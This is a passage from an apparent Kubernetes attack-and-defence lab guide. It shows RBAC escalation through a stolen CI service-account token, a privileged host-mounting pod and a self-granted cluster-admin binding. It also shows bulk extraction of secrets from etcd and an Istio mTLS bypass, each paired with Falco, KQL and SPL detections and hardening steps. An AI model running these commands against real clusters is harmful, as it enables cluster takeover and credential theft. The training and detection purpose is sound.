Time Estimate: 60–75 minutes ATT&CK Mapping: T1078.004 (Valid Accounts: Cloud Accounts), T1610 (Deploy Container)

Objectives¶

Enumerate RBAC permissions from a compromised service account
Discover overly permissive ClusterRole bindings that allow privilege escalation
Create a privileged pod using the service account to escalate privileges
Escalate to cluster-admin by exploiting RBAC misconfigurations
Access the Kubernetes API server with elevated permissions

Background¶

Kubernetes RBAC (Role-Based Access Control) is the primary authorization mechanism for the Kubernetes API. Misconfigured RBAC bindings are one of the most common pathways to cluster compromise. Service accounts that can create pods, modify RBAC, or access secrets across namespaces provide attackers with reliable escalation paths.

In this exercise, you start with the data-processor-sa service account token obtained in Exercise 1. Your goal is to escalate to cluster-admin through RBAC exploitation alone — without relying on container escape.

Step 2.1: Enumerate Service Account Permissions¶

# Set up API access using the compromised service account token
$ export TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
$ export APISERVER=https://10.96.0.1:443
$ alias k="kubectl --token=$TOKEN --server=$APISERVER --insecure-skip-tls-verify"

# What can this service account do?
$ k auth can-i --list
Resources                                       Non-Resource URLs   Resource Names   Verbs
pods                                            []                  []               [get list watch create update patch delete]
pods/exec                                       []                  []               [get list watch create update patch delete]
pods/log                                        []                  []               [get list watch create update patch delete]
services                                        []                  []               [get list watch create update patch delete]
configmaps                                      []                  []               [get list watch create update patch delete]
secrets                                         []                  []               [get list]
deployments.apps                                []                  []               [get list watch create update patch delete]
replicasets.apps                                []                  []               [get list watch create update patch delete]
daemonsets.apps                                 []                  []               [get list watch create update patch delete]
clusterroles.rbac.authorization.k8s.io          []                  []               [get list watch]
clusterrolebindings.rbac.authorization.k8s.io   []                  []               [get list watch]
roles.rbac.authorization.k8s.io                 []                  []               [get list watch]
rolebindings.rbac.authorization.k8s.io          []                  []               [get list watch]
selfsubjectaccessreviews.authorization.k8s.io   []                  []               [create]
selfsubjectrulesreviews.authorization.k8s.io    []                  []               [create]

Finding: Overly Permissive Service Account

The data-processor-sa service account can create pods, exec into pods, read secrets, create deployments, and read RBAC configurations across the cluster. This is far more permission than a data processing workload needs. The ability to create pods + read secrets is a classic privilege escalation vector.

Step 2.2: Enumerate Existing RBAC Bindings¶

# List all ClusterRoles
$ k get clusterroles -o custom-columns=NAME:.metadata.name,RULES:.rules[*].verbs | head -20
NAME                          RULES
admin                         [*]
ci-deployer                   [*]
cluster-admin                 [*]
edit                          [create delete deletecollection get list patch update watch]
skyforge-developer            [get list watch create update patch delete]
system:aggregate-to-admin     [*]
system:aggregate-to-edit      [create delete deletecollection patch update]
view                          [get list watch]
...

# Inspect the suspicious ci-deployer ClusterRole
$ k get clusterrole ci-deployer -o yaml
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: ci-deployer
rules:
- apiGroups: [""]
  resources: ["*"]
  verbs: ["*"]
- apiGroups: ["apps"]
  resources: ["*"]
  verbs: ["*"]
- apiGroups: ["rbac.authorization.k8s.io"]
  resources: ["*"]
  verbs: ["*"]

# Who is bound to ci-deployer?
$ k get clusterrolebindings -o json | jq -r '.items[] | select(.roleRef.name=="ci-deployer") | {name: .metadata.name, subjects: .subjects}'
{
  "name": "ci-deployer-binding",
  "subjects": [
    {
      "kind": "ServiceAccount",
      "name": "deploy-pipeline-sa",
      "namespace": "skyforge-ci"
    }
  ]
}

Finding: CI/CD Service Account Has cluster-admin Equivalent Permissions

The ci-deployer ClusterRole has wildcard permissions (*) on all resources in core, apps, and RBAC API groups. The deploy-pipeline-sa service account in the skyforge-ci namespace is bound to this role. If we can obtain this SA's token, we have effectively cluster-admin access — including the ability to modify RBAC itself.

Step 2.3: Steal CI/CD Service Account Token¶

# Since we can list secrets, find the CI/CD service account token
$ k get secrets -n skyforge-ci
NAME                              TYPE                                  DATA   AGE
default-token-xxxxx               kubernetes.io/service-account-token   3      5d
deploy-pipeline-sa-token-yyyyy    kubernetes.io/service-account-token   3      5d
registry-creds                    kubernetes.io/dockerconfigjson        1      5d

# Read the CI/CD service account token
$ k get secret deploy-pipeline-sa-token-yyyyy -n skyforge-ci -o jsonpath='{.data.token}' | base64 -d
eyJhbGciOiJSUzI1NiIsImtpZCI6InN5bnRoZXRpYy1rZXkifQ.SYNTHETIC_TOKEN_CI_DEPLOYER.REDACTED_SIGNATURE

# Store it
$ export CI_TOKEN="eyJhbGciOiJSUzI1NiIsImtpZCI6InN5bnRoZXRpYy1rZXkifQ.SYNTHETIC_TOKEN_CI_DEPLOYER.REDACTED_SIGNATURE"
$ alias kci="kubectl --token=$CI_TOKEN --server=$APISERVER --insecure-skip-tls-verify"

# Verify escalated permissions
$ kci auth can-i --list | head -10
Resources                                       Non-Resource URLs   Resource Names   Verbs
*.*                                             []                  []               [*]
                                                [*]                 []               [*]

Step 2.4: Create Privileged Pod for Node Access¶

# Use the CI/CD service account to create a privileged debug pod
# EDUCATIONAL PSEUDOCODE — demonstrates the technique for defensive understanding

$ cat <<'EOF' | kci apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: debug-pod-attacker
  namespace: skyforge-prod
  labels:
    app: debug-tools
spec:
  hostNetwork: true
  hostPID: true
  hostIPC: true
  containers:
  - name: debug
    image: registry.helios.example.com/skyforge/base-image:latest
    command: ["/bin/sh", "-c", "sleep 86400"]
    securityContext:
      privileged: true
    volumeMounts:
    - name: host-root
      mountPath: /host
  volumes:
  - name: host-root
    hostPath:
      path: /
      type: Directory
  nodeSelector:
    kubernetes.io/hostname: ip-10-60-1-20.ec2.internal
EOF
pod/debug-pod-attacker created

# Exec into the debug pod — now we're on Node 2
$ kci exec -it debug-pod-attacker -n skyforge-prod -- /bin/bash
root@ip-10-60-1-20:/# hostname
ip-10-60-1-20.ec2.internal

Step 2.5: Escalate to cluster-admin via RBAC Modification¶

# Since ci-deployer can modify RBAC, create a cluster-admin binding for our original SA
# EDUCATIONAL PSEUDOCODE — demonstrates the technique for defensive understanding

$ cat <<'EOF' | kci apply -f -
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: data-processor-admin
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: cluster-admin
subjects:
- kind: ServiceAccount
  name: data-processor-sa
  namespace: skyforge-prod
EOF
clusterrolebinding.rbac.authorization.k8s.io/data-processor-admin created

# Now our original service account has cluster-admin!
$ k auth can-i --list | head -5
Resources   Non-Resource URLs   Resource Names   Verbs
*.*         []                  []               [*]
            [*]                 []               [*]

$ k auth can-i '*' '*' --all-namespaces
yes

Critical: cluster-admin Achieved via RBAC Chain

Attack chain: data-processor-sa (can list secrets) -> deploy-pipeline-sa token stolen from skyforge-ci namespace -> CI/CD SA has RBAC wildcard permissions -> Created new ClusterRoleBinding granting data-processor-sa cluster-admin. This is a three-hop privilege escalation using only Kubernetes API calls.

Step 2.6: Demonstrate Post-Exploitation with cluster-admin¶

# List all secrets across ALL namespaces
$ k get secrets --all-namespaces | wc -l
47

# List all nodes
$ k get nodes -o wide
NAME                              STATUS   ROLES           AGE   VERSION   INTERNAL-IP   EXTERNAL-IP     OS-IMAGE
ip-10-60-1-10.ec2.internal       Ready    control-plane   5d    v1.29.2   10.60.1.10    203.0.113.40    Ubuntu 22.04
ip-10-60-1-20.ec2.internal       Ready    <none>          5d    v1.29.2   10.60.1.20    203.0.113.43    Ubuntu 22.04
ip-10-60-1-30.ec2.internal       Ready    <none>          5d    v1.29.2   10.60.1.30    203.0.113.44    Ubuntu 22.04

# Access secrets in kube-system namespace
$ k get secret -n kube-system
NAME                      TYPE                            DATA   AGE
bootstrap-token-xxxxx     bootstrap.kubernetes.io/token   6      5d
cloud-provider-config     Opaque                          1      5d
etcd-certs                kubernetes.io/tls               3      5d

# Enumerate all service accounts
$ k get sa --all-namespaces | wc -l
23

Detection: RBAC Exploitation¶

Falco Rules¶

# Falco rule: Detect listing secrets in sensitive namespaces
- rule: List Secrets in kube-system
  desc: Non-system account listing secrets in kube-system namespace
  condition: >
    kevt and kcreate and ka.target.resource = "selfsubjectaccessreviews"
    or (kevt and kget and ka.target.resource = "secrets"
    and ka.target.namespace = "kube-system"
    and not ka.user.name in (system_users))
  output: >
    Secrets listed in kube-system by non-system user
    (user=%ka.user.name resource=%ka.target.resource ns=%ka.target.namespace)
  priority: HIGH
  tags: [k8s, rbac, secrets]

# Falco rule: Detect ClusterRoleBinding creation
- rule: ClusterRoleBinding Created
  desc: New ClusterRoleBinding created — potential privilege escalation
  condition: >
    kevt and kcreate and ka.target.resource = "clusterrolebindings"
  output: >
    ClusterRoleBinding created (user=%ka.user.name
     binding=%ka.target.name role=%jevt.value[/requestObject/roleRef/name])
  priority: CRITICAL
  tags: [k8s, rbac, privilege_escalation]

KQL Detection¶

// KQL: Detect RBAC permission enumeration
AzureDiagnostics
| where Category == "kube-audit"
| extend AuditLog = parse_json(log_s)
| where AuditLog.verb == "create"
    and AuditLog.objectRef.resource == "selfsubjectaccessreviews"
| project TimeGenerated,
    User = AuditLog.user.username,
    SourceIP = AuditLog.sourceIPs[0],
    UserAgent = AuditLog.userAgent
| summarize EnumCount = count(), DistinctIPs = dcount(SourceIP) by User, bin(TimeGenerated, 5m)
| where EnumCount > 3
| sort by TimeGenerated desc

// KQL: Detect ClusterRoleBinding creation to cluster-admin
AzureDiagnostics
| where Category == "kube-audit"
| extend AuditLog = parse_json(log_s)
| where AuditLog.verb == "create"
    and AuditLog.objectRef.resource == "clusterrolebindings"
| extend RoleRef = AuditLog.requestObject.roleRef.name
| where RoleRef == "cluster-admin"
| project TimeGenerated,
    User = AuditLog.user.username,
    BindingName = AuditLog.objectRef.name,
    RoleRef,
    Subjects = AuditLog.requestObject.subjects,
    SourceIP = AuditLog.sourceIPs[0]
| sort by TimeGenerated desc

// KQL: Detect privileged pod creation by non-system accounts
AzureDiagnostics
| where Category == "kube-audit"
| extend AuditLog = parse_json(log_s)
| where AuditLog.verb == "create"
    and AuditLog.objectRef.resource == "pods"
| extend Privileged = AuditLog.requestObject.spec.containers[0].securityContext.privileged,
    HostNetwork = AuditLog.requestObject.spec.hostNetwork,
    HostPID = AuditLog.requestObject.spec.hostPID
| where Privileged == true or HostNetwork == true or HostPID == true
| where AuditLog.user.username !startswith "system:"
| project TimeGenerated,
    User = AuditLog.user.username,
    Namespace = AuditLog.objectRef.namespace,
    PodName = AuditLog.objectRef.name,
    Privileged, HostNetwork, HostPID
| sort by TimeGenerated desc

SPL Detection¶

// SPL: Detect ClusterRoleBinding creation to cluster-admin
index=kubernetes sourcetype="kube:audit"
  verb=create objectRef.resource=clusterrolebindings
| spath "requestObject.roleRef.name" as role_ref
| where role_ref="cluster-admin"
| table _time, user.username, objectRef.name, role_ref, requestObject.subjects{}.name, sourceIPs{}

// SPL: Detect cross-namespace secret access
index=kubernetes sourcetype="kube:audit"
  verb=get objectRef.resource=secrets
| spath "user.username" as user
| spath "objectRef.namespace" as target_ns
| where NOT match(user, "^system:")
| stats count as access_count, values(target_ns) as namespaces_accessed by user
| where mvcount(namespaces_accessed) > 1
| table _time, user, namespaces_accessed, access_count

// SPL: Detect RBAC enumeration (auth can-i --list)
index=kubernetes sourcetype="kube:audit"
  verb=create objectRef.resource=selfsubjectaccessreviews
| spath "user.username" as user
| spath "sourceIPs{}" as src_ip
| bin _time span=5m
| stats count as enum_count by _time, user, src_ip
| where enum_count > 3
| table _time, user, src_ip, enum_count

Defensive Measures: Preventing RBAC Exploitation¶

Prevention Controls

1. Principle of Least Privilege for Service Accounts

# GOOD: Minimal role for data-processor
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: data-processor-minimal
  namespace: skyforge-prod
rules:
- apiGroups: [""]
  resources: ["configmaps"]
  verbs: ["get"]
  resourceNames: ["data-processor-config"]  # Named resources only

2. Disable Automount of Service Account Tokens

apiVersion: v1
kind: ServiceAccount
metadata:
  name: data-processor-sa
  namespace: skyforge-prod
automountServiceAccountToken: false

3. Restrict RBAC Modification

Never grant create, update, or patch on clusterrolebindings or clusterroles to non-admin service accounts:

# Use ValidatingAdmissionWebhook to block:
# - ClusterRoleBinding creation referencing cluster-admin
# - ClusterRole creation with wildcard verbs/resources

4. Use Namespace-Scoped Roles Instead of ClusterRoles

# Prefer Role + RoleBinding (namespace-scoped)
# over ClusterRole + ClusterRoleBinding (cluster-wide)
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: ci-deployer-prod-only
  namespace: skyforge-prod  # Scoped to single namespace
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: Role
  name: deployer-role
subjects:
- kind: ServiceAccount
  name: deploy-pipeline-sa
  namespace: skyforge-ci

5. RBAC Audit with rbac-police or kubectl-who-can

# Regularly audit who can escalate privileges
$ kubectl-who-can create clusterrolebindings
$ kubectl-who-can create pods --subresource=exec
$ kubectl-who-can get secrets --all-namespaces

Exercise 2 Summary¶

Step	Action	Finding	Severity
2.1	Permission enumeration	SA has pod create + secret read + RBAC read	High
2.2	RBAC binding enumeration	ci-deployer has wildcard permissions	Critical
2.3	Cross-namespace secret theft	CI/CD SA token accessible	Critical
2.4	Privileged pod creation	Node access via debug pod	Critical
2.5	RBAC modification	Self-granted cluster-admin	Critical
2.6	Post-exploitation	Full cluster control achieved	Critical

Exercise 3: Secret Extraction & etcd Access¶

Time Estimate: 45–60 minutes ATT&CK Mapping: T1552.007 (Unsecured Credentials: Container API), T1552.001 (Unsecured Credentials: Credentials in Files)

Objectives¶

Access the etcd datastore from a compromised control plane node
Extract Kubernetes secrets directly from etcd using etcdctl
Decode base64-encoded secrets and demonstrate the data at risk
Understand why encryption at rest for etcd is critical
Detect and prevent unauthorized etcd access

Background¶

etcd is the key-value store that backs the entire Kubernetes cluster state — including all Secrets, ConfigMaps, RBAC policies, and workload definitions. By default, Kubernetes stores Secrets in etcd as base64-encoded plaintext (not encrypted). An attacker who gains access to etcd can extract every secret in the cluster without going through the Kubernetes API.

In this exercise, you have escalated to the control plane node (from Exercise 1 or 2). The goal is to demonstrate direct etcd access and why encryption at rest is a must-have control.

Step 3.1: Identify etcd on the Control Plane¶

# After escaping to the control plane node (10.60.1.10)
# Locate etcd process
$ ps aux | grep etcd
root      2847  5.1  8.2 10794532 167280 ?    Ssl  Apr07   4:32 /usr/local/bin/etcd \
  --advertise-client-urls=https://10.60.1.10:2379 \
  --cert-file=/etc/kubernetes/pki/etcd/server.crt \
  --client-cert-auth=true \
  --data-dir=/var/lib/etcd \
  --key-file=/etc/kubernetes/pki/etcd/server.key \
  --listen-client-urls=https://127.0.0.1:2379,https://10.60.1.10:2379 \
  --listen-peer-urls=https://10.60.1.10:2380 \
  --trusted-ca-file=/etc/kubernetes/pki/etcd/ca.crt

# Note the certificate locations — we need these to authenticate
$ ls -la /etc/kubernetes/pki/etcd/
total 40
drwxr-xr-x 2 root root 4096 Apr  7 08:00 .
drwxr-xr-x 3 root root 4096 Apr  7 08:00 ..
-rw-r--r-- 1 root root 1058 Apr  7 08:00 ca.crt
-rw------- 1 root root 1679 Apr  7 08:00 ca.key
-rw-r--r-- 1 root root 1159 Apr  7 08:00 healthcheck-client.crt
-rw------- 1 root root 1679 Apr  7 08:00 healthcheck-client.key
-rw-r--r-- 1 root root 1159 Apr  7 08:00 peer.crt
-rw------- 1 root root 1679 Apr  7 08:00 peer.key
-rw-r--r-- 1 root root 1159 Apr  7 08:00 server.crt
-rw------- 1 root root 1679 Apr  7 08:00 server.key

# Verify etcd is accessible
$ export ETCDCTL_API=3
$ export ETCDCTL_CACERT=/etc/kubernetes/pki/etcd/ca.crt
$ export ETCDCTL_CERT=/etc/kubernetes/pki/etcd/server.crt
$ export ETCDCTL_KEY=/etc/kubernetes/pki/etcd/server.key
$ export ETCDCTL_ENDPOINTS=https://127.0.0.1:2379

$ etcdctl endpoint health
https://127.0.0.1:2379 is healthy: successfully committed proposal: took = 2.108775ms

Step 3.2: Enumerate etcd Contents¶

# List all keys in etcd (Kubernetes stores data under /registry/)
$ etcdctl get / --prefix --keys-only | head -30
/registry/apiregistration.k8s.io/apiservices/v1.
/registry/apiregistration.k8s.io/apiservices/v1.apps
/registry/clusterrolebindings/ci-deployer-binding
/registry/clusterrolebindings/cluster-admin
/registry/clusterrolebindings/data-processor-admin
/registry/clusterrolebindings/skyforge-developer-binding
/registry/clusterroles/ci-deployer
/registry/clusterroles/cluster-admin
/registry/clusterroles/skyforge-developer
/registry/configmaps/skyforge-prod/data-processor-config
/registry/deployments/skyforge-prod/api-gateway
/registry/deployments/skyforge-prod/auth-service
/registry/deployments/skyforge-prod/report-engine
/registry/namespaces/default
/registry/namespaces/istio-system
/registry/namespaces/kube-system
/registry/namespaces/monitoring
/registry/namespaces/skyforge-ci
/registry/namespaces/skyforge-prod
/registry/namespaces/skyforge-staging
/registry/pods/skyforge-prod/data-processor
/registry/secrets/default/default-token-xxxxx
/registry/secrets/kube-system/bootstrap-token-xxxxx
/registry/secrets/kube-system/cloud-provider-config
/registry/secrets/kube-system/etcd-certs
/registry/secrets/skyforge-ci/deploy-pipeline-sa-token-yyyyy
/registry/secrets/skyforge-ci/registry-creds
/registry/secrets/skyforge-prod/auth-secrets
/registry/secrets/skyforge-prod/db-credentials
/registry/secrets/skyforge-prod/tls-certs

# Count total secrets
$ etcdctl get /registry/secrets --prefix --keys-only | wc -l
18

Step 3.3: Extract Secrets from etcd¶

# Extract the database credentials secret
$ etcdctl get /registry/secrets/skyforge-prod/db-credentials
# Output is binary protobuf — use -w fields to see structured data

$ etcdctl get /registry/secrets/skyforge-prod/db-credentials -w fields
"Key" : "/registry/secrets/skyforge-prod/db-credentials"
"Value" : "k8s\x00\n\x0f\n\x02v1\x12\x06Secret\x..."

# The raw output is protobuf-encoded. Extract just the data portion:
$ etcdctl get /registry/secrets/skyforge-prod/db-credentials -w json | jq -r '.kvs[0].value' | base64 -d
{
  "apiVersion": "v1",
  "kind": "Secret",
  "metadata": {
    "name": "db-credentials",
    "namespace": "skyforge-prod"
  },
  "data": {
    "username": "c2t5Zm9yZ2VfYWRtaW4=",
    "password": "UkVEQUNURUQ=",
    "connection-string": "cG9zdGdyZXNxbDovL3NreWZvcmdlX2FkbWluOlJFREFDVEVEQDEwLjYwLjIuMTA6NTQzMi9za3lmb3JnZQ=="
  }
}

# Decode the base64 values
$ echo "c2t5Zm9yZ2VfYWRtaW4=" | base64 -d
skyforge_admin

$ echo "UkVEQUNURUQ=" | base64 -d
REDACTED

$ echo "cG9zdGdyZXNxbDovL3NreWZvcmdlX2FkbWluOlJFREFDVEVEQDEwLjYwLjIuMTA6NTQzMi9za3lmb3JnZQ==" | base64 -d
postgresql://skyforge_admin:REDACTED@10.60.2.10:5432/skyforge

Finding: Secrets Stored in Plaintext in etcd

Kubernetes secrets are only base64-encoded — not encrypted — in etcd by default. Anyone with read access to etcd can extract every secret in the cluster. This includes database passwords, API keys, TLS private keys, OAuth client secrets, and service account tokens.

Step 3.4: Extract All Secrets at Scale¶

# EDUCATIONAL PSEUDOCODE — demonstrates the scope of the threat
# Extract all secrets from all namespaces in one operation

$ for key in $(etcdctl get /registry/secrets --prefix --keys-only); do
    echo "=== $key ==="
    etcdctl get "$key" -w json | jq -r '.kvs[0].value' | base64 -d 2>/dev/null | \
      python3 -c "import sys,json; d=json.load(sys.stdin); [print(f'  {k}: {__import__(\"base64\").b64decode(v).decode()}') for k,v in d.get('data',{}).items()]" 2>/dev/null
done

Expected Output (Synthetic — all values REDACTED):

=== /registry/secrets/skyforge-prod/auth-secrets ===
  jwt-secret: REDACTED
  oauth-client-secret: REDACTED

=== /registry/secrets/skyforge-prod/db-credentials ===
  username: skyforge_admin
  password: REDACTED
  connection-string: postgresql://skyforge_admin:REDACTED@10.60.2.10:5432/skyforge

=== /registry/secrets/skyforge-prod/tls-certs ===
  tls.crt: REDACTED-CERTIFICATE-DATA
  tls.key: REDACTED-PRIVATE-KEY-DATA

=== /registry/secrets/skyforge-ci/registry-creds ===
  .dockerconfigjson: {"auths":{"registry.helios.example.com":{"auth":"REDACTED"}}}

=== /registry/secrets/kube-system/cloud-provider-config ===
  cloud-config: REDACTED-AWS-CREDENTIALS

=== /registry/secrets/kube-system/etcd-certs ===
  tls.crt: REDACTED-ETCD-CERT
  tls.key: REDACTED-ETCD-KEY
  ca.crt: REDACTED-ETCD-CA

Critical: Complete Secret Inventory Extracted

From etcd, 18 secrets were extracted across all namespaces including:

Database credentials (PostgreSQL connection strings)
Authentication secrets (JWT signing keys, OAuth client secrets)
TLS certificates and private keys
Container registry credentials
Cloud provider configuration (AWS credentials)
etcd TLS certificates (self-referential — access to etcd grants more etcd access)

Step 3.5: Demonstrate Encryption at Rest Gap¶

# Check if etcd encryption at rest is configured
$ cat /etc/kubernetes/manifests/kube-apiserver.yaml | grep encryption
# If no output — encryption at rest is NOT configured

# Check for EncryptionConfiguration
$ ls /etc/kubernetes/enc/
ls: cannot access '/etc/kubernetes/enc/': No such file or directory
# Encryption config does not exist — secrets are stored in plaintext

# What proper encryption configuration looks like:
$ cat <<'EOF'
# RECOMMENDED: EncryptionConfiguration for secrets at rest
apiVersion: apiserver.config.k8s.io/v1
kind: EncryptionConfiguration
resources:
  - resources:
      - secrets
      - configmaps
    providers:
      - aescbc:
          keys:
            - name: key1
              secret: REDACTED-BASE64-ENCODED-32-BYTE-KEY
      - identity: {}  # Fallback for reading unencrypted data
EOF

# To enable, add to kube-apiserver manifest:
# --encryption-provider-config=/etc/kubernetes/enc/encryption-config.yaml

Detection: etcd Access¶

Falco Rules¶

# Falco rule: Detect etcdctl execution on control plane
- rule: etcdctl Executed on Control Plane
  desc: etcdctl command was executed — potential secret extraction
  condition: >
    spawned_process and proc.name = "etcdctl"
    and not user.name in (etcd_maintenance_users)
  output: >
    etcdctl executed (user=%user.name command=%proc.cmdline
     parent=%proc.pname container=%container.name)
  priority: CRITICAL
  tags: [etcd, secrets, credential_access, T1552]

# Falco rule: Detect reading etcd certificate files
- rule: etcd Certificate Files Read
  desc: Process reading etcd TLS certificates — potential etcd access preparation
  condition: >
    open_read and (fd.name startswith /etc/kubernetes/pki/etcd/)
    and not proc.name in (etcd, kube-apiserver, kubelet)
  output: >
    etcd certificate file read by unexpected process
    (file=%fd.name process=%proc.name user=%user.name)
  priority: HIGH
  tags: [etcd, certificate, credential_access]

KQL Detection¶

// KQL: Detect etcd access from non-API-server processes
// This requires node-level audit logging (e.g., Azure Monitor agent on AKS nodes)
Syslog
| where SyslogMessage has "etcdctl" or SyslogMessage has "etcd" and SyslogMessage has "get"
| where ProcessName != "kube-apiserver" and ProcessName != "etcd"
| project TimeGenerated, Computer, ProcessName, SyslogMessage
| sort by TimeGenerated desc

// KQL: Detect etcd port access from unexpected sources
AzureNetworkAnalytics_CL
| where DestPort_d == 2379 or DestPort_d == 2380
| where SrcIP_s !in ("10.60.1.10", "10.60.1.11", "10.60.1.12")  // Expected control plane nodes
| project TimeGenerated, SrcIP_s, DestIP_s, DestPort_d, FlowStatus_s
| sort by TimeGenerated desc

// KQL: Detect bulk secret reads via Kubernetes API (alternative path)
AzureDiagnostics
| where Category == "kube-audit"
| extend AuditLog = parse_json(log_s)
| where AuditLog.verb == "list" and AuditLog.objectRef.resource == "secrets"
| project TimeGenerated,
    User = AuditLog.user.username,
    Namespace = AuditLog.objectRef.namespace,
    SourceIP = AuditLog.sourceIPs[0]
| summarize SecretListCount = count() by User, bin(TimeGenerated, 5m)
| where SecretListCount > 5
| sort by TimeGenerated desc

SPL Detection¶

// SPL: Detect etcdctl execution
index=os sourcetype="syslog" OR sourcetype="linux:audit"
  ("etcdctl" AND ("get" OR "watch" OR "snapshot"))
| eval severity=case(
    searchmatch("--prefix"), "CRITICAL",
    searchmatch("/registry/secrets"), "CRITICAL",
    1=1, "HIGH"
  )
| table _time, host, user, process, cmdline, severity

// SPL: Detect etcd port connections from unexpected sources
index=network sourcetype="firewall" dest_port IN (2379, 2380)
| where NOT cidrmatch("10.60.1.0/24", src_ip)
| table _time, src_ip, dest_ip, dest_port, action

// SPL: Detect bulk secret reads through Kubernetes API
index=kubernetes sourcetype="kube:audit"
  verb IN ("get", "list") objectRef.resource=secrets
| spath "user.username" as user
| bin _time span=1m
| stats count as secret_reads, dc(objectRef.namespace) as namespaces by user, _time
| where secret_reads > 10 OR namespaces > 2
| table _time, user, secret_reads, namespaces

Defensive Measures: Protecting etcd¶

Prevention Controls

1. Enable Encryption at Rest

# /etc/kubernetes/enc/encryption-config.yaml
apiVersion: apiserver.config.k8s.io/v1
kind: EncryptionConfiguration
resources:
  - resources:
      - secrets
      - configmaps
    providers:
      - aescbc:
          keys:
            - name: key1
              secret: REDACTED-BASE64-ENCODED-32-BYTE-KEY
      - identity: {}

Add to kube-apiserver: --encryption-provider-config=/etc/kubernetes/enc/encryption-config.yaml

2. Use External Secrets Management

# Use External Secrets Operator with HashiCorp Vault or AWS Secrets Manager
apiVersion: external-secrets.io/v1beta1
kind: ExternalSecret
metadata:
  name: db-credentials
  namespace: skyforge-prod
spec:
  refreshInterval: 1h
  secretStoreRef:
    name: vault-backend
    kind: ClusterSecretStore
  target:
    name: db-credentials
  data:
    - secretKey: password
      remoteRef:
        key: skyforge/database
        property: password

3. Restrict etcd Network Access

etcd should only be accessible from the API server
Use network policies / firewall rules to restrict port 2379/2380
Enable mutual TLS for all etcd communications

4. etcd Client Certificate Rotation

Rotate etcd certificates regularly and restrict file permissions:

chmod 600 /etc/kubernetes/pki/etcd/*.key
chmod 644 /etc/kubernetes/pki/etcd/*.crt
chown root:root /etc/kubernetes/pki/etcd/*

5. Regular Secret Auditing

# Audit all secrets for encryption status
$ kubectl get secrets --all-namespaces -o json | \
    jq -r '.items[] | "\(.metadata.namespace)/\(.metadata.name) - \(.type)"'

Exercise 3 Summary¶

Step	Action	Finding	Severity
3.1	etcd identification	etcd accessible with node certs	Critical
3.2	Key enumeration	Full cluster state visible in etcd	Critical
3.3	Secret extraction	Database credentials decoded	Critical
3.4	Bulk extraction	18 secrets across all namespaces	Critical
3.5	Encryption audit	No encryption at rest configured	Critical

Exercise 4: Service Mesh Attacks¶

Time Estimate: 60–75 minutes ATT&CK Mapping: T1557 (Adversary-in-the-Middle), T1071.001 (Application Layer Protocol)

Objectives¶

Bypass Istio mTLS by communicating directly between pods without the mesh
Manipulate Istio VirtualService resources to hijack traffic between services
Extract service mesh certificates from sidecar containers
Demonstrate sidecar injection attacks
Detect service mesh tampering through Istio telemetry and audit logs

Background¶

Service meshes like Istio provide mutual TLS (mTLS), traffic management, and observability. However, a misconfigured service mesh can create a false sense of security. If mTLS is set to PERMISSIVE mode instead of STRICT, pods can communicate without encryption. An attacker with RBAC access to Istio custom resources (VirtualService, DestinationRule, Gateway) can redirect traffic, inject sidecars with malicious configurations, or extract mesh certificates for impersonation.

Step 4.1: Enumerate Service Mesh Configuration¶

# Check if Istio is installed and which version
$ k get pods -n istio-system
NAME                                    READY   STATUS    RESTARTS   AGE
istio-ingressgateway-7b4c9d5f8-x9k2m   1/1     Running   0          5d
istiod-6f8c4d9b7-p4m2n                  1/1     Running   0          5d

$ k get svc -n istio-system
NAME                   TYPE           CLUSTER-IP    EXTERNAL-IP     PORT(S)
istio-ingressgateway   LoadBalancer   10.96.0.100   203.0.113.42    80:30080/TCP,443:30443/TCP
istiod                 ClusterIP      10.96.0.50    <none>          15010/TCP,15012/TCP,443/TCP,15014/TCP

# Check mTLS mode
$ k get peerauthentication --all-namespaces
NAMESPACE        NAME           MODE         AGE
istio-system     default        PERMISSIVE   5d
skyforge-prod    mesh-policy    PERMISSIVE   5d

# Check if all pods have sidecar injection
$ k get pods -n skyforge-prod -o jsonpath='{range .items[*]}{.metadata.name}{"\t"}{.spec.containers[*].name}{"\n"}{end}'
data-processor      processor
auth-service-xxx    auth istio-proxy
auth-service-yyy    auth istio-proxy
api-gateway-xxx     gateway istio-proxy
api-gateway-yyy     gateway istio-proxy
api-gateway-zzz     gateway istio-proxy
report-engine-xxx   reports istio-proxy

Finding: mTLS in PERMISSIVE Mode

The mesh-wide mTLS policy is set to PERMISSIVE, meaning pods accept both encrypted (mTLS) and plaintext connections. An attacker inside the mesh can bypass mTLS entirely by sending plaintext HTTP directly to pod IPs, bypassing the Envoy sidecar.

Finding: data-processor Pod Missing Sidecar

The compromised data-processor pod does not have an istio-proxy sidecar container. This means it operates outside the mesh's mTLS and traffic policy enforcement. It can communicate with any pod using plaintext, bypassing all mesh policies.

Step 4.2: Bypass mTLS — Direct Pod Communication¶

# From the data-processor pod (no sidecar), communicate directly with auth-service
# Bypass the mesh by hitting the pod IP instead of the service

# Get auth-service pod IP
$ k get pods -n skyforge-prod -l app=auth-service -o wide
NAME                  READY   STATUS    IP           NODE
auth-service-abc123   2/2     Running   10.244.1.15  ip-10-60-1-20.ec2.internal
auth-service-def456   2/2     Running   10.244.2.22  ip-10-60-1-30.ec2.internal

# Direct HTTP request to auth-service pod (bypassing Envoy sidecar)
# Because mTLS is PERMISSIVE, the application port accepts plaintext
$ curl -s http://10.244.1.15:8080/api/v1/users/1
{
  "id": 1,
  "username": "admin",
  "email": "admin@helios.example.com",
  "role": "cluster-admin",
  "last_login": "2026-04-07T07:30:00Z"
}

# This request was NOT encrypted, NOT logged by Istio telemetry,
# and NOT subject to Istio authorization policies

Finding: mTLS Bypass Successful

By communicating directly to the pod IP on the application port, the attacker bypasses the Envoy sidecar entirely. This means:

No mTLS encryption on the wire
No Istio access logs for the request
No Istio AuthorizationPolicy enforcement
No rate limiting or traffic management

Step 4.3: Traffic Hijacking via VirtualService Manipulation¶

# With cluster-admin (from Exercise 2), modify Istio VirtualService
# to redirect traffic destined for auth-service to our data-processor pod

# First, check existing VirtualServices
$ k get virtualservices -n skyforge-prod
NAME              GATEWAYS   HOSTS             AGE
